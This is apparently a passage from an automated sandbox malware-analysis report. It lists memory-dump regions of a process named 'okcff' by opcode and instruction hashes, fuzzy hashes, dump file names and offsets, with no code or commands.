                                                            • Instruction ID: f42c272a8ea87826965a4e29db8fb686a6b41850a8a10fb8ee25a9e3c028ab65
                                                            • Opcode Fuzzy Hash: 3c0a699ae7b495a49f52e7b46d0a1aa96920a4a727b8214b5aeef20fe1f5449e
                                                            • Instruction Fuzzy Hash: 9C028E34A44254CFCB19DFA4C554AADBBF2BF89304F2680BAD4269B3A9DB31DC45CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 719b257f2ec38be650a4845c492bac7d855a91ab1f4787c56d75fad01ef9cf7a
                                                            • Instruction ID: 1d6fe13c2b56295df175237ac9d6a6bddf2f06b7182365cf23b82edbf4edbb4f
                                                            • Opcode Fuzzy Hash: 719b257f2ec38be650a4845c492bac7d855a91ab1f4787c56d75fad01ef9cf7a
                                                            • Instruction Fuzzy Hash: AFE1CA30F842029FEB18AF69D49077EBAE2AF85300F154429F9A6DB391DB74D981CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9566f96dd523413b3146b2e41b55fbd4d61100df83c4402eb29526afd84e7b41
                                                            • Instruction ID: 59e71c9dacc4c53e65d4c6f92cf31f46239e804725dcccd0c1ba8518dfa37272
                                                            • Opcode Fuzzy Hash: 9566f96dd523413b3146b2e41b55fbd4d61100df83c4402eb29526afd84e7b41
                                                            • Instruction Fuzzy Hash: 7C02BE34A50114DFCB08EFA4D994AAEB7B2FF89304F158159E905AB3A5DB30EC46CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a5cab84e7958f81290ede7219ccab4755b4d9aa058d5e5e48cb96ea117c77892
                                                            • Instruction ID: 3ef6673d02707e061ae40abb389ea7f8cecdededa4546b98abb71c01b55c3a26
                                                            • Opcode Fuzzy Hash: a5cab84e7958f81290ede7219ccab4755b4d9aa058d5e5e48cb96ea117c77892
                                                            • Instruction Fuzzy Hash: 98E18030B042698FCB29DF74C8506ADBBF2AF85200F5589AED51AE7341DB319D45CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 35978fb8b25a47e3d7c208b0c6c02aca4ee8d8d4946410100d101777101b4325
                                                            • Instruction ID: 675d992d1a26d326e4becb313e07dc4adc79f6bc036948288f34314a7577762f
                                                            • Opcode Fuzzy Hash: 35978fb8b25a47e3d7c208b0c6c02aca4ee8d8d4946410100d101777101b4325
                                                            • Instruction Fuzzy Hash: E0E11535A0520AEFCF05CF98C9909AEBBB2FF49314B248469E905A7361D731ED51CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0ed066fd3fba98662d8ebba8f5e20dee9b43f89c34a07ac03a24d648e0d2eeac
                                                            • Instruction ID: e01a3025b944adc72192026c49fd78db46590f7710f12bb3231daa2ddad85140
                                                            • Opcode Fuzzy Hash: 0ed066fd3fba98662d8ebba8f5e20dee9b43f89c34a07ac03a24d648e0d2eeac
                                                            • Instruction Fuzzy Hash: BAB1AC31B082349FCB54DB69C8509BEB7FABF89200B94456FE146DB751CB31E816CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 115f3a5f4a4dd5cda89e1cf11319a55546321356e5932e296e123541a4778084
                                                            • Instruction ID: bf20ee6d53d3a28653a5bee3205734d5f5ef37bf44eeb09a531f2b1b4b84f32d
                                                            • Opcode Fuzzy Hash: 115f3a5f4a4dd5cda89e1cf11319a55546321356e5932e296e123541a4778084
                                                            • Instruction Fuzzy Hash: 52D17E30A44609DFCB18EF64C8D49AEB7B2BF4D314B168569E826AB361D730DC49CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f8ce8cc4bb90af800a25e9836623c2257719f2e8fe48cee62d1e5a55009cddc9
                                                            • Instruction ID: 162cd6d89188ba6253c58ac626f663938e0c0bab29c27e9037039b0b6f068ff7
                                                            • Opcode Fuzzy Hash: f8ce8cc4bb90af800a25e9836623c2257719f2e8fe48cee62d1e5a55009cddc9
                                                            • Instruction Fuzzy Hash: 13C19C30A84215DFDB199FA4C854BBEBBB3BF84704F254079E512AB394DB768C85CB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2756d55730fad576ae236ac576677ce0663c20422cb00a258198e3c3c6321f49
                                                            • Instruction ID: de7c27e030aebf65928bb710503e167477b4dba7e6cbdf9bbdad9231e3c5ea2c
                                                            • Opcode Fuzzy Hash: 2756d55730fad576ae236ac576677ce0663c20422cb00a258198e3c3c6321f49
                                                            • Instruction Fuzzy Hash: 57B1A030E89218FFCB1CAB64E0542BDBAA3AFC4340F925439D527AB384DB315D49CB52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e053af12940b45db6eb9e47c30262d92b89c89b73af9a1eafa1ec0d552355192
                                                            • Instruction ID: d97623241b7f1fa1203d88f759742fd5053d7142afbccb66e1db295aeb533cc4
                                                            • Opcode Fuzzy Hash: e053af12940b45db6eb9e47c30262d92b89c89b73af9a1eafa1ec0d552355192
                                                            • Instruction Fuzzy Hash: D8A1D530B49216DFC7285F34941413DBAE3BF89718726853EC6668B350EF318D46CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: be7d264e279e3f183fb18f9dff4c301238b3ba2573ef96880e9b809ce990a5ba
                                                            • Instruction ID: c1c2a488154f540795e11c5ae3a20425b724750db89622f185ec6678a6e0575b
                                                            • Opcode Fuzzy Hash: be7d264e279e3f183fb18f9dff4c301238b3ba2573ef96880e9b809ce990a5ba
                                                            • Instruction Fuzzy Hash: 17A19F31B452049FCB05DF69D494AAEBBF2EF89614F2884A6E821DB391CB35DD42CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5de50e0f697da05efc97836c0def1bd82530a27b584fbfead80de3c06b7339e4
                                                            • Instruction ID: 421b32edd8b34a2bd50124debbe1f012f467b66bb55847ad633b03ac83d78841
                                                            • Opcode Fuzzy Hash: 5de50e0f697da05efc97836c0def1bd82530a27b584fbfead80de3c06b7339e4
                                                            • Instruction Fuzzy Hash: CDA1F334794518CFC708EF39C8D8A2977EAAF8D64431640A9E556CB372DB61EC45CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d0c00f7daf6410bdc8d8b64b22adcf1b95bc733ebe1650818226903900cb8b3c
                                                            • Instruction ID: c35d62f7d148cdb351047107e368aad3d872826f48ad55c3e2f9c71c772b87c5
                                                            • Opcode Fuzzy Hash: d0c00f7daf6410bdc8d8b64b22adcf1b95bc733ebe1650818226903900cb8b3c
                                                            • Instruction Fuzzy Hash: 52A1AA74A08258CFC718EFA8C4545ADBBF2FF89718B12847DD122AB355DB35984ACB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77c4e8a20cf43a03c81da1a764a1743010dbbd3e1bb0c8b6d8efe6caeb366f56
                                                            • Instruction ID: a628a150ad750d76df66e14a96a5276e3b66c15e0ba77dcc8d9167158dd9e51a
                                                            • Opcode Fuzzy Hash: 77c4e8a20cf43a03c81da1a764a1743010dbbd3e1bb0c8b6d8efe6caeb366f56
                                                            • Instruction Fuzzy Hash: 3FA16F30985249CFCF19CF60D844AAEBBB2BF45304F16857BE012AB651D731E982CBD2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621229391.0000000002160000.00000040.00000010.sdmp, Offset: 02160000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2160000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a3005521be1ce37fa2811d6dede3362abd0cbfdadc365b83c41726805ae3d960
                                                            • Instruction ID: dfbc34d306837b1d0d77895d6743439bca665e09ca726d566bd128b9c17a9f1c
                                                            • Opcode Fuzzy Hash: a3005521be1ce37fa2811d6dede3362abd0cbfdadc365b83c41726805ae3d960
                                                            • Instruction Fuzzy Hash: 6181AC31E04284DFCB24CFA8C5855ADB7B6FF85310B25856AD859AB311CB32EC91CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 014d0044b56f5a8b4c09dc7ae4209cf66e0368ff89b67739903d923e16273f62
                                                            • Instruction ID: 3857b25c89d9260d295deaa81c94e6de046e61dc0a3023eb2bfdeef05a7c207d
                                                            • Opcode Fuzzy Hash: 014d0044b56f5a8b4c09dc7ae4209cf66e0368ff89b67739903d923e16273f62
                                                            • Instruction Fuzzy Hash: 7BA1DE34A50118DFCB08EFA4D994AADB7B2FF89304F158169E905AB365DB30ED46CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 31e9ad9ce157d93d639b4757fc02fe0656a67a67c4c74a7064f20502c836c091
                                                            • Instruction ID: b5b8bb2caace2179fbb77efbb19dbefad7d61469ba341078a5e0efd9120cf95c
                                                            • Opcode Fuzzy Hash: 31e9ad9ce157d93d639b4757fc02fe0656a67a67c4c74a7064f20502c836c091
                                                            • Instruction Fuzzy Hash: B0711231B082649FCB45DF68C4A0AAFB7A2EF89314F15843AED15DB345CB30DD528B92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2cb529afede9fd1ab3eae7c758cd4e04d8b40e000d96ee69062273e161139fde
                                                            • Instruction ID: 9c0a63d482f37f2945167c78ff89ad483e03f85b981185e37ed7eb3b8c509d27
                                                            • Opcode Fuzzy Hash: 2cb529afede9fd1ab3eae7c758cd4e04d8b40e000d96ee69062273e161139fde
                                                            • Instruction Fuzzy Hash: 96713531B146308FCB24DBA5D854AFFB7BBBF85210F8045AFE1169B791DB30A9168781
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621229391.0000000002160000.00000040.00000010.sdmp, Offset: 02160000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2160000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d1f41e44dac698fc53b5dada2894563d5f8964903b8e6a9d23c218114a767067
                                                            • Instruction ID: d0d84d13b3482e3c0d3222198423b5b7c4dd02da6057d21c10ca79d02384c634
                                                            • Opcode Fuzzy Hash: d1f41e44dac698fc53b5dada2894563d5f8964903b8e6a9d23c218114a767067
                                                            • Instruction Fuzzy Hash: 4461AC31FC8221AB8B391A69552833F65D7BBCCA54B664429DA17DB340DF31CC62C7E2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4127a13c7584a23aad4340326edcb4859135d5a9a9d551be4fb73f000befb710
                                                            • Instruction ID: b7ae31048284a51fc0bd8386648e09291ef659e02eb29e1e8392d0c0abcb21cf
                                                            • Opcode Fuzzy Hash: 4127a13c7584a23aad4340326edcb4859135d5a9a9d551be4fb73f000befb710
                                                            • Instruction Fuzzy Hash: 8671A035A44209EFCB15CF68C480AADF7F2BF89314F1585A6D51AAB361D731EC45CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1d0e7f5b43f279a2b3c6612da8c4586ce4faa6600bb025fdff97062578537c4f
                                                            • Instruction ID: 8d5141a34f6a7be00bf8c18647ed252f15317b127e44e82cb21f7ebfa201b1fb
                                                            • Opcode Fuzzy Hash: 1d0e7f5b43f279a2b3c6612da8c4586ce4faa6600bb025fdff97062578537c4f
                                                            • Instruction Fuzzy Hash: 5931253070D2804FC7029B7898909AE7BE2DFD7208B0544BAD60ADF766DF35DD0687A2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eecd97d5c36ec80274fed7568443725a22540320747ba4be2ffb632375a605a2
                                                            • Instruction ID: 91ec296be42edd50698e8139e6e0881dc5eef83f36af91251883e3d8e7e8fb27
                                                            • Opcode Fuzzy Hash: eecd97d5c36ec80274fed7568443725a22540320747ba4be2ffb632375a605a2
                                                            • Instruction Fuzzy Hash: 8931EA74B082089FCB04DF68C584BAA77F6FB8D348B1184A5E505EB361DB31EE02DB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 01c345aef5ce8d591b45b306eedbe7e9524d4fc8b45de99fbfac9d9895d0202d
                                                            • Instruction ID: 6ec0d5ed18fc2dfd0efc27e38b77e72749bdbf121e3d2692b017f416ef16aed4
                                                            • Opcode Fuzzy Hash: 01c345aef5ce8d591b45b306eedbe7e9524d4fc8b45de99fbfac9d9895d0202d
                                                            • Instruction Fuzzy Hash: 7121F4313453004FD715AB79E8A4A67B7D6DFC5225B15C47AD10ECB291DB32EC428B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ca5413fc26ff6a7bbdd2ac741c62dbc7aa3c40acc0d210f6b4fbf15a3113a5ae
                                                            • Instruction ID: 2a5c2299195fb9486c1429d232c4bbd3689b90a72bf178e908ca0649cb8e73ec
                                                            • Opcode Fuzzy Hash: ca5413fc26ff6a7bbdd2ac741c62dbc7aa3c40acc0d210f6b4fbf15a3113a5ae
                                                            • Instruction Fuzzy Hash: F8319030A14218CFCB18DF65D454AAEBBB2FF98704F114929E906AB7A0DF71AC45CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 22cccd90a8594fdbfe1b070707c4325f2fb8cf3287339f63377f1318d38468e4
                                                            • Instruction ID: 610b4a288980d29f5d3b15cae7192ee847d23eeea06945595002d2f1a8987a67
                                                            • Opcode Fuzzy Hash: 22cccd90a8594fdbfe1b070707c4325f2fb8cf3287339f63377f1318d38468e4
                                                            • Instruction Fuzzy Hash: 76218731384190DFC7299B64E454A3A7BEEEF85310B1684BAE5578B3A1CB73EC40C791
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 45992715cec2143dd029abcc55cd1fa1326d17ed2d03b195670b1b968e733cb0
                                                            • Instruction ID: e5d1fdf502ce520274c26d9203ec697ae5419da6cea33658458f568c1f93d84b
                                                            • Opcode Fuzzy Hash: 45992715cec2143dd029abcc55cd1fa1326d17ed2d03b195670b1b968e733cb0
                                                            • Instruction Fuzzy Hash: E821D3353442944FDB15EF35899467E3BE69F8A210B088469F842CB3A1EF39CC49DB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0579c8b8e58caeb55778b08db2e22c2a822ddcb2d5fe0a41c4ef772996749170
                                                            • Instruction ID: 7742105c9d60d2258970a3e81b678926ca761974d4f405eadf8026b2db1dd91c
                                                            • Opcode Fuzzy Hash: 0579c8b8e58caeb55778b08db2e22c2a822ddcb2d5fe0a41c4ef772996749170
                                                            • Instruction Fuzzy Hash: 10210576A042489FCB16DFE4D8908DEBBF9FF89210F01456AE545EB351DB30AE05CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2c5d19beea55c6adbdbf6dd2f2d0f90acf5c07a8ae9dc50c3fdba0fd87161ae6
                                                            • Instruction ID: 6a49e5815e8d72d04e1a319501f32b4f2eca0fe972fbda644d582075f261ae66
                                                            • Opcode Fuzzy Hash: 2c5d19beea55c6adbdbf6dd2f2d0f90acf5c07a8ae9dc50c3fdba0fd87161ae6
                                                            • Instruction Fuzzy Hash: 4E313C313442849FCB169F6AD8909AA3FFAAF8A359B0940A5FC54CB361CB35DC51DB20
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621229391.0000000002160000.00000040.00000010.sdmp, Offset: 02160000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2160000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d4e226c6e5f288727bd22a1d8d96fdff3d609786f90dd1ae31fbde070a081138
                                                            • Instruction ID: c395515891feb9b7b85a0bb87e990a4d8bdf6c74daf5c766bedce16400c870c9
                                                            • Opcode Fuzzy Hash: d4e226c6e5f288727bd22a1d8d96fdff3d609786f90dd1ae31fbde070a081138
                                                            • Instruction Fuzzy Hash: 1E31F671A042889FCB14CF68C1596FEBBF6AF4B210F1AC4A9D459AB351CB31EC45CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0c3200bf3fe83bde2373ad45c0af8487d7ce525ec662ad11a7cbe38f36a911e2
                                                            • Instruction ID: b9010eb4ba931f36a1fb348e36f8b6d7522adec3154f7958d194dbf3cd53da04
                                                            • Opcode Fuzzy Hash: 0c3200bf3fe83bde2373ad45c0af8487d7ce525ec662ad11a7cbe38f36a911e2
                                                            • Instruction Fuzzy Hash: 28316F31A08675FFCB20CFA9C6958EFBBB2BF54314BD0491AE64356A10C770B94ADB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ac197dbad1e7a8b5ecba6b8c052cea716336a4640fe93ad2be921f870c27cbc9
                                                            • Instruction ID: db749a5435539aed12ee77ba75f5435d61c7e6a2ffcc896b1aac012b0c28973b
                                                            • Opcode Fuzzy Hash: ac197dbad1e7a8b5ecba6b8c052cea716336a4640fe93ad2be921f870c27cbc9
                                                            • Instruction Fuzzy Hash: D331B470A44129DFEB28CFA4E950AEE7BF5AB4C304F154065D812B7A80DB759E41CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 75269f3b0edd461659586199411d6518bdf2e45f3aa6d0b2386e316e626a80b7
                                                            • Instruction ID: daf85f3f48dfd09306a5a25072cc621d21bd087d1a2447ccfb128c65e364560a
                                                            • Opcode Fuzzy Hash: 75269f3b0edd461659586199411d6518bdf2e45f3aa6d0b2386e316e626a80b7
                                                            • Instruction Fuzzy Hash: 5021BC30B4828DDFCB1C8EA4C550ABEBBBE9B89204F155479D462AB348DB729D45CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621229391.0000000002160000.00000040.00000010.sdmp, Offset: 02160000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2160000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 83583dbfeba3746911c5754904f7700325c6bf071762dd9f806446d6cf18a289
                                                            • Instruction ID: 6bd0394f466155f9ab4a4f0c15ca34d1c7470cf39bdb59228bf0bb9aba969fb9
                                                            • Opcode Fuzzy Hash: 83583dbfeba3746911c5754904f7700325c6bf071762dd9f806446d6cf18a289
                                                            • Instruction Fuzzy Hash: 13316931A01244DFC714DF98C1099BEB7F6AF8A210F16C469D829AB750CB31EC80CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 571ea8d40e60425c8cfc47cbb4d891989bac922eafc6eb0806e3d239e4c726c6
                                                            • Instruction ID: 57374bd3f1da9f87ca433e3d3ddc66947b3171176f172e6b8ea5005d4559490e
                                                            • Opcode Fuzzy Hash: 571ea8d40e60425c8cfc47cbb4d891989bac922eafc6eb0806e3d239e4c726c6
                                                            • Instruction Fuzzy Hash: 07317C30A04628DFCB18DF24C8549AE7BB3BF89614B44492AE5079B760CFB1ED46CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 056ef9f0dafd55c9a64484dffef77bc804f3abcdd3b3b5aa8ced5d90378fa3fb
                                                            • Instruction ID: ccd4ea77621c841218020cdbc0159c0618ef77bc0daabd1e30957831ccf32dec
                                                            • Opcode Fuzzy Hash: 056ef9f0dafd55c9a64484dffef77bc804f3abcdd3b3b5aa8ced5d90378fa3fb
                                                            • Instruction Fuzzy Hash: F12181317086308F8B58DA78D4589BE73EAEF8965434184BBE40BCB771DA21DC028FA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
